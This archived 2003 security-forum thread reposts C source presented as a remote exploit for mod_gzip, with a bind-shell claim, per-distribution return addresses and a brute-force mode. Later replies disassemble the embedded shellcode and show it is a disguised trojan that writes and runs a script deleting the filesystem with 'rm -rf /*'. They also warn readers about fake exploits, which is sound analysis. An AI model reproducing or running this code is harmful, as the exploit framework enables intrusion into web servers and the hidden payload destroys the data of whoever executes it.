Mod_gzip

Full Version: Mod_gzip

GovernmentSecurity.org > The Archives > Exploit Articles

gsicht

Nov 24 2003, 05:00 PM

i found this:

CODE

/* m00-mod_gzip.c
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
* Binds shell on port 63021.
* Based on 85mod_gzip.c by xCrZx // crazy_einstein@yahoo.com
*
* Available targets:
* Suse 8.1
* RedHat 7.3
* RedHat 8.0
* RedHat 9.0
* Mandrake 9.1
*
*
* Testing:
* sh-2.05b$ ./m00-mod_gzip localhost 80
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
* [~] Connecting to localhost:80
* [~] Connected!
* [~] Trying to connect to localhost:63021 port!!!
* [~] Sleeping...
*
* [+] Shell spawned! w00t!!!
*
* uid=99(nobody) gid=99(nobody) groups=99(nobody)
* Linux localhost 2.4.21-0.13mdk #1 Fri Nov 22 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
* 20:29:44 up 2:29, 3 users, load average: 0.04, 0.09, 0.11
*
*
* Greets to:
* - nerF security team // www.nerf.ru
* - LimpidByte // lbyte.sysdrop.org
* - priv8security (especially to wsxz =)) // www.priv8security.com
* - UHAGr // www.uhagr.com
* - ech0 // x25.cc
* - ppl from EFnet@m00sec and #nerf
* - all our friends from #xakep@DALnet
*
* Authors:
* - Over_G // overg[at]mail.ru
* - d4rkgr3y // d4rk[at]securitylab.ru
*
* Released 22/11/03 // www.m00.ru
*/

#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#define STEP 1000

char fmt[] =

"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";

//shellcode for Linux x86 -> bind shell on 63021 port//
char default_shellcode[] =
"\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
"\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
"\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
"\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
"\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
"\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
"\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
"\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";

struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {

/* you can add targets here */

{"RedHat 9.0", // flavour info
0xbfffc8a2, // ret_addr in stack
0x31823610, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3"

},

{"RedHat 8.0", // flavour info
0xbfffd8f0, // ret_addr in stack
0x42127480, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"

},

{"RedHat 7.3", // flavour info
0xbffcf610, // ret_addr in stack
0x42131806, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"

},

{"SuSe 8.1", // flavour info
0xbfc917c0, // ret_add in stack
0x58184617, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3"

},

{"Mandrake 9.1", // flavour info
0xbc04172f, // ret_add in stack
0x41196735, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3"

}

};

long getip(char *hostname) {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

void usage(char *prog) {

int i=0;

printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);

}

int main(int argc, char **argv) {

int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
void (*range)();
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;

printf("\nmod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru\n\n");

for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}

if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
(long) range=default_shellcode;
//range();
jmp=targets[trg].jmp;

printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);

printf("\n");

if(brutemode)printf("[~] Brutemode activated!\n");

do {

sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);

if(!brutemode)printf("\n[~] Connecting to %s:%d\n",victim,port);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

if(!brutemode)printf("[~] Connected!\n",i);

memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);

memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;

memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));

sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));

}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}

close(sock);

ret-= step;

if(brutemode) {printf(".");fflush(stdout);}

if(!brutemode) {
printf("[~] Trying to connect to %s:%d port!!!\n",victim,shellport);
printf("[~] Sleeping...\n");
}

sleep(2);

sock=socket(PF_INET,SOCK_STREAM,0);

bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[+] Shell spawned! w00t!!!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);

if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");

close(sock);

} while ( brutemode );

return 0;
}

creep01

Nov 26 2003, 11:30 AM

i'll just write it in caps just to be sure that someone is going to read it ....
THIS IS A TROJAN DON'T COMPILE AND EXECUTE THE CODE IT WILL PERFORM A rm -fr / & INTO YOUR SYSTEM.

Or else, this program will try to erase all of the system in the computer that you are going to execute it.

Creep01

Reposting, i checked the code again, the exploit is a fake though the code that is executing the rm -fr / & is ommited.

(long) range=default_shellcode;
//range(); <-----------
jmp=targets[trg].jmp;

So generally this is a simple useless piece of code.

gsicht

Nov 26 2003, 02:05 PM

ohh, sorry

DarkieD

Nov 26 2003, 02:31 PM

u didnt think of that by ur own now did u?

i can read bugtraq

gsicht

Nov 26 2003, 03:17 PM

darkieD, i never tested this code.
can you read hex?

DarkieD

Nov 26 2003, 07:36 PM

it was ment for creep01
not for u

creep01

Nov 27 2003, 09:16 AM

yes and it's easy just use your brain
1. take a look at the shellcode is rather small
2. take a look at the code

(long) range=default_shellcode;
//range(); <-- here
jmp=targets[trg].jmp;

and above

void (*range)();

3. echo -e "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F" (illh -f hh rmhin/)
and the rest part of the shellcode
4. compile the code and strings into the binary.
5. run gdb and start the program.
6. trace into it

Don't post flames kiddo learn to respect others. If someone is saying something here doesn't mean that he copied. Try to remember that some people use their brain.

Creep

DarkieD

Nov 27 2003, 10:53 AM

ofcourse it was a small shellcode...

And plz dont call me kiddo lol.
think i am a bit older then u

gsicht

Nov 28 2003, 01:06 PM

creep01, don't say that you check every shellcode in each exploit.
//range(); << yes, i had to see this

i found the code here:
http://m00.void.ru/message
i thought that i can trust this site.

shaun2k2

Nov 28 2003, 04:45 PM

gsicht, it's okay, don't worry, it's pretty easy to make mistakes like this. In future though, look at the code, and look to see if at any point in the code, has the exploit done something that you wouldn't have thought it needed to? Bear that in mind, and treat exploits matching that as suspicious.

Some teenagers get bored, so they modify or create an "exploit" for an existing vulnerability which is really just a trojan.

Thank you for your time.
Shaun.

pupkinvasya

Nov 30 2003, 03:12 AM

0x0804a5a0 <default_shellcode+0>: xor %eax,%eax
0x0804a5a2 <default_shellcode+2>: push %eax
0x0804a5a3 <default_shellcode+3>: push $0x6e69622f
0x0804a5a8 <default_shellcode+8>: mov %esp,%ebx
0x0804a5aa <default_shellcode+10>: mov $0xc,%al
0x0804a5ac <default_shellcode+12>: int $0x80 -> chdir("/bin")
0x0804a5ae <default_shellcode+14>: xor %eax,%eax
0x0804a5b0 <default_shellcode+16>: push %eax
0x0804a5b1 <default_shellcode+17>: push $0x7a7a7a7a
0x0804a5b6 <default_shellcode+22>: mov %esp,%ebx
0x0804a5b8 <default_shellcode+24>: push $0x41
0x0804a5ba <default_shellcode+26>: pop %ecx
0x0804a5bb <default_shellcode+27>: mov $0x5,%al
0x0804a5bd <default_shellcode+29>: int $0x80 -> open("zzzz", 0x41)
0x0804a5bf <default_shellcode+31>: xor %ecx,%ecx
0x0804a5c1 <default_shellcode+33>: push %ecx
0x0804a5c2 <default_shellcode+34>: push $0x26202a2f
0x0804a5c7 <default_shellcode+39>: push $0x2066722d
0x0804a5cc <default_shellcode+44>: push $0x206d720a
0x0804a5d1 <default_shellcode+49>: push $0x6c6c696b
0x0804a5d6 <default_shellcode+54>: push $0x20662d20
0x0804a5db <default_shellcode+59>: push $0x6d720a68
0x0804a5e0 <default_shellcode+64>: push $0x732f6e69
0x0804a5e5 <default_shellcode+69>: push $0x622f2123
0x0804a5ea <default_shellcode+74>: mov %esp,%ecx
0x0804a5ec <default_shellcode+76>: mov %eax,%ebx
0x0804a5ee <default_shellcode+78>: mov $0x20,%dl
0x0804a5f0 <default_shellcode+80>: mov $0x4,%al
0x0804a5f2 <default_shellcode+82>: int $0x80 -> write(fd, "#!/bin/sh
rm -f kill
rm -rf /* &", 0x20);
0x0804a5f4 <default_shellcode+84>: mov $0x6,%al
0x0804a5f6 <default_shellcode+86>: int $0x80 -> close(fd)
0x0804a5f8 <default_shellcode+88>: xor %eax,%eax
0x0804a5fa <default_shellcode+90>: push %eax
0x0804a5fb <default_shellcode+91>: push $0x7a7a7a7a
0x0804a600 <default_shellcode+96>: mov %esp,%ebx
0x0804a602 <default_shellcode+98>: mov $0x1ed,%cx
0x0804a606 <default_shellcode+102>: mov $0xf,%al
0x0804a608 <default_shellcode+104>: int $0x80 -> chmod("zzz", 0755)
0x0804a60a <default_shellcode+106>: xor %eax,%eax
0x0804a60c <default_shellcode+108>: xor %edx,%edx
0x0804a60e <default_shellcode+110>: push %eax
0x0804a60f <default_shellcode+111>: push $0x7a7a7a7a
0x0804a614 <default_shellcode+116>: push $0x2f2f2f2e
0x0804a619 <default_shellcode+121>: mov %esp,%ebx
0x0804a61b <default_shellcode+123>: push %eax
0x0804a61c <default_shellcode+124>: push %ebx
0x0804a61d <default_shellcode+125>: mov %esp,%ecx
0x0804a61f <default_shellcode+127>: mov $0xb,%al
0x0804a621 <default_shellcode+129>: int $0x80 ->
execve("/bin/zzzz", "/bin/zzzz", 0)
0x0804a623 <default_shellcode+131>: xor %eax,%eax
0x0804a625 <default_shellcode+133>: inc %eax
0x0804a626 <default_shellcode+134>: int $0x80 -> exit()
0x0804a628 <default_shellcode+136>: add %al,(%eax)
0x0804a62a <default_shellcode+138>: add %al,(%eax)
0x0804a62c <default_shellcode+140>: add %al,(%eax)
0x0804a62e <default_shellcode+142>: add %al,(%eax)
0x0804a630 <default_shellcode+144>: add %al,(%eax)
0x0804a632 <default_shellcode+146>: add %al,(%eax)
0x0804a634 <default_shellcode+148>: add %al,(%eax)
0x0804a636 <default_shellcode+150>: add %al,(%eax)
0x0804a638 <default_shellcode+152>: add %al,(%eax)
0x0804a63a <default_shellcode+154>: add %al,(%eax)
0x0804a63c <default_shellcode+156>: add %al,(%eax)
0x0804a63e <default_shellcode+158>: add %al,(%eax)

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.